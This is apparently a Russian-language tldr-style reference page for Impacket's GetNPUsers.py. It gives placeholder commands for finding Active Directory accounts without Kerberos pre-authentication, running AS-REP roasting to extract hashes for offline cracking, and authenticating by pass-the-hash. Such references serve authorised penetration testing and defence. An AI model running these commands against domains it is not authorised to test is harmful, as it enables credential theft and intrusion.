2.0 KiB
GetNPUsers.py
Получать список учётных записей Active Directory с отключённой предварительной аутентификацией Kerberos, которые могут быть уязвимы для атак AS-REP roasting. Часть набора инструментов Impacket. Больше информации: https://github.com/fortra/impacket.
- Вывести список пользователей с отключённой предварительной аутентификацией Kerberos (анонимный перебор по умолчанию):
GetNPUsers.py {{домен}}/ -usersfile {{путь/к/списку_пользователей}} -dc-ip {{ip_контроллера_домена}} -no-pass
- Выполнить атаку AS-REP roasting и извлечь хеши для офлайн-взлома:
GetNPUsers.py {{домен}}/ -usersfile {{путь/к/списку_пользователей}} -dc-ip {{ip_контроллера_домена}} -no-pass -request
- Аутентифицироваться с действительными учётными данными (если анонимная привязка отключена):
GetNPUsers.py {{домен}}/{{имя_пользователя}}:{{пароль}} -usersfile {{путь/к/списку_пользователей}} -dc-ip {{ip_контроллера_домена}}
- Использовать аутентификацию pass-the-hash вместо пароля:
GetNPUsers.py {{домен}}/{{имя_пользователя}} -hashes {{LM_хеш}}:{{NT_хеш}} -usersfile {{путь/к/списку_пользователей}} -dc-ip {{ip_контроллера_домена}}
- Сохранить результаты в файл для дальнейшего анализа:
GetNPUsers.py {{домен}}/ -usersfile {{путь/к/списку_пользователей}} -dc-ip {{ip_контроллера_домена}} -request > {{путь/к/выходному_файлу.txt}}